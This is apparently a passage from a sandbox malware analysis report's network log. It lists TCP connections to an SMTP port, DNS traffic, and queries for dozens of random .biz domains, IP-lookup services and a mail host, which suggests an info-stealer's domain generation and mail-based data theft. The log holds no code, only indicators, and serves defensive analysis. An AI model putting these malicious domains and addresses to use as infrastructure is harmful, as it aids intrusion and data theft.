Nov 28, 2024 06:45:11.407069921 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.447710037 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.447813034 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.528578997 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.529288054 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.529663086 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.530232906 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.531104088 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.532150030 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.533253908 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.534405947 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.534476995 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.536262989 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.536438942 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.538086891 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.538137913 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.538204908 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.538220882 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.538264990 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.539849997 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.539859056 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.539949894 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.539958954 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.542042017 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.542092085 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.542154074 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.542191029 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.542262077 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.544950962 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.544960022 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.571521997 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.571710110 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.653075933 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.653084993 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.653122902 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.654772043 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.654779911 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:12.093070984 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:12.138890982 CET	49955	587	192.168.2.4	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 06:41:00.230000019 CET	51321	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:00.879825115 CET	53	51321	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:01.312659025 CET	62348	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:01.456553936 CET	53	62348	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:02.857497931 CET	56625	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:02.999819040 CET	53	56625	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:03.153042078 CET	55668	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:03.640707016 CET	53	55668	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:04.720968008 CET	51424	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:04.863636017 CET	53	51424	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:05.842556000 CET	52287	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:05.957545042 CET	56453	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:05.984324932 CET	53	52287	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:06.111263037 CET	64858	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:06.253618956 CET	53	64858	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:06.621968985 CET	53	56453	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:07.750922918 CET	55722	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:08.075865984 CET	53	55722	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:08.936748028 CET	51423	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:08.985258102 CET	62746	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:09.255354881 CET	53	51423	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:09.473756075 CET	53	62746	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:11.009332895 CET	54346	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:11.250536919 CET	53	54346	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:14.252022028 CET	53383	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:14.394335985 CET	53	53383	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:14.394985914 CET	53257	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:14.892731905 CET	53	53257	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:15.845552921 CET	52372	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:15.987929106 CET	53	52372	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:17.284462929 CET	54263	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:17.428697109 CET	53	54263	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:17.429716110 CET	57938	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:17.649848938 CET	53	57938	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:17.650562048 CET	60038	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:18.378688097 CET	53	60038	1.1.1.1	192.168.2.4
Nov 28, 2024 06:41:18.654692888 CET	63926	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:41:18.799073935 CET	53	63926	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:03.264075041 CET	63033	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:03.935302019 CET	53	63033	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:49.397310972 CET	52423	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:49.852696896 CET	53	52423	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:52.001945019 CET	56495	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:52.467926979 CET	53	56495	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:54.750734091 CET	51873	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:55.223339081 CET	53	51873	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:56.504195929 CET	62549	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:57.167975903 CET	53	62549	1.1.1.1	192.168.2.4
Nov 28, 2024 06:42:59.389542103 CET	57958	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:42:59.699141026 CET	53	57958	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:02.428963900 CET	56036	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:02.889674902 CET	53	56036	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:04.469400883 CET	49414	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:05.304985046 CET	53	49414	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:06.586704969 CET	57358	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:07.272051096 CET	53	57358	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:08.874337912 CET	49921	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:09.355329990 CET	53	49921	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:11.525844097 CET	53179	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:12.014588118 CET	53	53179	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:13.358037949 CET	61389	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:13.831267118 CET	53	61389	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:15.441546917 CET	59432	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:15.928200960 CET	53	59432	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:17.421015024 CET	62864	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:17.900840044 CET	53	62864	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:19.149450064 CET	55102	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:19.544133902 CET	53	55102	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:21.444598913 CET	58369	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:22.106606007 CET	53	58369	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:23.623528004 CET	64509	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:24.142800093 CET	53	64509	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:25.965378046 CET	63032	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:26.446454048 CET	53	63032	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:28.094505072 CET	55179	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:28.565164089 CET	53	55179	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:30.073025942 CET	56686	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:30.542460918 CET	53	56686	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:50.224852085 CET	50839	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:50.698504925 CET	53	50839	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:51.952244043 CET	64180	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:52.417704105 CET	53	64180	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:53.700047970 CET	54075	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:54.162873030 CET	53	54075	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:56.453578949 CET	62047	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:56.776045084 CET	53	62047	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:56.776962042 CET	61271	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:57.252832890 CET	53	61271	1.1.1.1	192.168.2.4
Nov 28, 2024 06:43:58.813757896 CET	65099	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:43:59.289573908 CET	53	65099	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:00.584990025 CET	61873	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:01.048329115 CET	53	61873	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:03.557537079 CET	62734	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:04.031538963 CET	53	62734	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:07.090286016 CET	59687	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:07.606899977 CET	53	59687	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:09.248883963 CET	64199	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:09.729979992 CET	53	64199	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:11.941329002 CET	49513	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:12.406516075 CET	53	49513	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:14.598964930 CET	57820	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:15.081072092 CET	53	57820	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:16.661622047 CET	53584	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:17.136461020 CET	53	53584	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:18.463911057 CET	56342	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:18.946954012 CET	53	56342	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:20.618972063 CET	56421	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:21.097068071 CET	53	56421	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:22.737476110 CET	58234	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:22.878952980 CET	53	58234	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:24.830825090 CET	65515	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:25.292131901 CET	53	65515	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:27.501038074 CET	60709	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:27.981496096 CET	53	60709	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:29.610999107 CET	63018	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:30.099250078 CET	53	63018	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:32.295133114 CET	50463	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:32.761079073 CET	53	50463	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:34.049165964 CET	55432	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:34.360759020 CET	53	55432	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:34.551672935 CET	61457	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:35.020282984 CET	53	61457	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:37.288872004 CET	53052	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:37.763474941 CET	53	53052	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:39.332149982 CET	56932	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:39.800936937 CET	53	56932	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:42.054738998 CET	51665	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:42.517395020 CET	53	51665	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:44.705852985 CET	50524	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:45.183821917 CET	53	50524	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:46.466584921 CET	51803	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:46.934849977 CET	53	51803	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:48.464164019 CET	52393	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:48.937120914 CET	53	52393	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:50.271776915 CET	52482	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:50.736228943 CET	53	52482	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:52.283066988 CET	54191	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:52.744383097 CET	53	54191	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:54.312484980 CET	63363	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:54.790857077 CET	53	63363	1.1.1.1	192.168.2.4
Nov 28, 2024 06:44:58.169960976 CET	59372	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:44:58.639028072 CET	53	59372	1.1.1.1	192.168.2.4
Nov 28, 2024 06:45:00.251058102 CET	49503	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:45:00.888843060 CET	49503	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:45:00.922355890 CET	53	49503	1.1.1.1	192.168.2.4
Nov 28, 2024 06:45:01.032640934 CET	53	49503	1.1.1.1	192.168.2.4
Nov 28, 2024 06:45:03.196002960 CET	52403	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:45:03.677004099 CET	53	52403	1.1.1.1	192.168.2.4
Nov 28, 2024 06:45:05.007433891 CET	64921	53	192.168.2.4	1.1.1.1
Nov 28, 2024 06:45:05.466051102 CET	53	64921	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2024 06:41:00.230000019 CET	192.168.2.4	1.1.1.1	0xe12a	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:01.312659025 CET	192.168.2.4	1.1.1.1	0x9ebb	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:02.857497931 CET	192.168.2.4	1.1.1.1	0x22b3	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:03.153042078 CET	192.168.2.4	1.1.1.1	0x21ba	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:04.720968008 CET	192.168.2.4	1.1.1.1	0xecfa	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.842556000 CET	192.168.2.4	1.1.1.1	0x4129	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.957545042 CET	192.168.2.4	1.1.1.1	0xeb5f	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:06.111263037 CET	192.168.2.4	1.1.1.1	0x1578	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:07.750922918 CET	192.168.2.4	1.1.1.1	0x3d40	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:08.936748028 CET	192.168.2.4	1.1.1.1	0x883d	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:08.985258102 CET	192.168.2.4	1.1.1.1	0xdd57	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:11.009332895 CET	192.168.2.4	1.1.1.1	0xa2b9	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:14.252022028 CET	192.168.2.4	1.1.1.1	0x7b75	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:14.394985914 CET	192.168.2.4	1.1.1.1	0xa4d6	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:15.845552921 CET	192.168.2.4	1.1.1.1	0x2c6d	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:17.284462929 CET	192.168.2.4	1.1.1.1	0xc558	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:17.429716110 CET	192.168.2.4	1.1.1.1	0x83e9	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:17.650562048 CET	192.168.2.4	1.1.1.1	0x388b	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:18.654692888 CET	192.168.2.4	1.1.1.1	0xfb2c	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:03.264075041 CET	192.168.2.4	1.1.1.1	0x8fec	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:49.397310972 CET	192.168.2.4	1.1.1.1	0xeb7b	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:52.001945019 CET	192.168.2.4	1.1.1.1	0xb22e	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:54.750734091 CET	192.168.2.4	1.1.1.1	0xad48	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:56.504195929 CET	192.168.2.4	1.1.1.1	0x788f	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:59.389542103 CET	192.168.2.4	1.1.1.1	0x7814	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:02.428963900 CET	192.168.2.4	1.1.1.1	0xe2ef	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:04.469400883 CET	192.168.2.4	1.1.1.1	0x27a4	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:06.586704969 CET	192.168.2.4	1.1.1.1	0x4602	Standard query (0)	gytujflc.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:08.874337912 CET	192.168.2.4	1.1.1.1	0xc021	Standard query (0)	qaynky.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:11.525844097 CET	192.168.2.4	1.1.1.1	0x9190	Standard query (0)	bumxkqgxu.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:13.358037949 CET	192.168.2.4	1.1.1.1	0xe9ca	Standard query (0)	dwrqljrr.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:15.441546917 CET	192.168.2.4	1.1.1.1	0x396	Standard query (0)	nqwjmb.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:17.421015024 CET	192.168.2.4	1.1.1.1	0xa5e8	Standard query (0)	ytctnunms.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:19.149450064 CET	192.168.2.4	1.1.1.1	0xa867	Standard query (0)	myups.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:21.444598913 CET	192.168.2.4	1.1.1.1	0xc126	Standard query (0)	oshhkdluh.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:23.623528004 CET	192.168.2.4	1.1.1.1	0x34c1	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:25.965378046 CET	192.168.2.4	1.1.1.1	0x8ffc	Standard query (0)	jpskm.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:28.094505072 CET	192.168.2.4	1.1.1.1	0x5648	Standard query (0)	lrxdmhrr.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:30.073025942 CET	192.168.2.4	1.1.1.1	0x344c	Standard query (0)	wllvnzb.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:50.224852085 CET	192.168.2.4	1.1.1.1	0x5fd6	Standard query (0)	gnqgo.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:51.952244043 CET	192.168.2.4	1.1.1.1	0xd050	Standard query (0)	jhvzpcfg.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:53.700047970 CET	192.168.2.4	1.1.1.1	0x7f83	Standard query (0)	acwjcqqv.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:56.453578949 CET	192.168.2.4	1.1.1.1	0x7d29	Standard query (0)	lejtdj.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:56.776962042 CET	192.168.2.4	1.1.1.1	0xc51d	Standard query (0)	vyome.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:58.813757896 CET	192.168.2.4	1.1.1.1	0x4ffe	Standard query (0)	yauexmxk.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:00.584990025 CET	192.168.2.4	1.1.1.1	0xafb2	Standard query (0)	iuzpxe.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:03.557537079 CET	192.168.2.4	1.1.1.1	0x3fbb	Standard query (0)	sxmiywsfv.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:07.090286016 CET	192.168.2.4	1.1.1.1	0x5f0c	Standard query (0)	vrrazpdh.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:09.248883963 CET	192.168.2.4	1.1.1.1	0xdda3	Standard query (0)	ftxlah.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:11.941329002 CET	192.168.2.4	1.1.1.1	0x45ec	Standard query (0)	typgfhb.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:14.598964930 CET	192.168.2.4	1.1.1.1	0x1d9e	Standard query (0)	esuzf.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:16.661622047 CET	192.168.2.4	1.1.1.1	0xe0f8	Standard query (0)	gvijgjwkh.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:18.463911057 CET	192.168.2.4	1.1.1.1	0x3bb7	Standard query (0)	qpnczch.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:20.618972063 CET	192.168.2.4	1.1.1.1	0x545f	Standard query (0)	brsua.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:22.737476110 CET	192.168.2.4	1.1.1.1	0xec1b	Standard query (0)	dlynankz.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:24.830825090 CET	192.168.2.4	1.1.1.1	0xd99c	Standard query (0)	oflybfv.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:27.501038074 CET	192.168.2.4	1.1.1.1	0x9837	Standard query (0)	yhqqc.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:29.610999107 CET	192.168.2.4	1.1.1.1	0xbf1	Standard query (0)	mnjmhp.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:32.295133114 CET	192.168.2.4	1.1.1.1	0xf001	Standard query (0)	opowhhece.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:34.049165964 CET	192.168.2.4	1.1.1.1	0x94cb	Standard query (0)	zjbpaao.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:34.551672935 CET	192.168.2.4	1.1.1.1	0xef9c	Standard query (0)	jdhhbs.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:37.288872004 CET	192.168.2.4	1.1.1.1	0xd4d1	Standard query (0)	mgmsclkyu.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:39.332149982 CET	192.168.2.4	1.1.1.1	0x46aa	Standard query (0)	warkcdu.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:42.054738998 CET	192.168.2.4	1.1.1.1	0xadb0	Standard query (0)	gcedd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:44.705852985 CET	192.168.2.4	1.1.1.1	0x6708	Standard query (0)	jwkoeoqns.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:46.466584921 CET	192.168.2.4	1.1.1.1	0xfc5e	Standard query (0)	xccjj.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:48.464164019 CET	192.168.2.4	1.1.1.1	0xbae	Standard query (0)	hehckyov.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:50.271776915 CET	192.168.2.4	1.1.1.1	0xf309	Standard query (0)	rynmcq.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:52.283066988 CET	192.168.2.4	1.1.1.1	0xf65b	Standard query (0)	uaafd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:54.312484980 CET	192.168.2.4	1.1.1.1	0x99c4	Standard query (0)	eufxebus.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:58.169960976 CET	192.168.2.4	1.1.1.1	0x6a7f	Standard query (0)	pwlqfu.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:00.251058102 CET	192.168.2.4	1.1.1.1	0x31c7	Standard query (0)	rrqafepng.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:00.888843060 CET	192.168.2.4	1.1.1.1	0x31c7	Standard query (0)	rrqafepng.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:03.196002960 CET	192.168.2.4	1.1.1.1	0xb614	Standard query (0)	ctdtgwag.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:05.007433891 CET	192.168.2.4	1.1.1.1	0x7995	Standard query (0)	tnevuluw.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2024 06:41:00.879825115 CET	1.1.1.1	192.168.2.4	0xe12a	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:01.456553936 CET	1.1.1.1	192.168.2.4	0x9ebb	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:02.999819040 CET	1.1.1.1	192.168.2.4	0x22b3	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:03.640707016 CET	1.1.1.1	192.168.2.4	0x21ba	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:04.863636017 CET	1.1.1.1	192.168.2.4	0xecfa	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
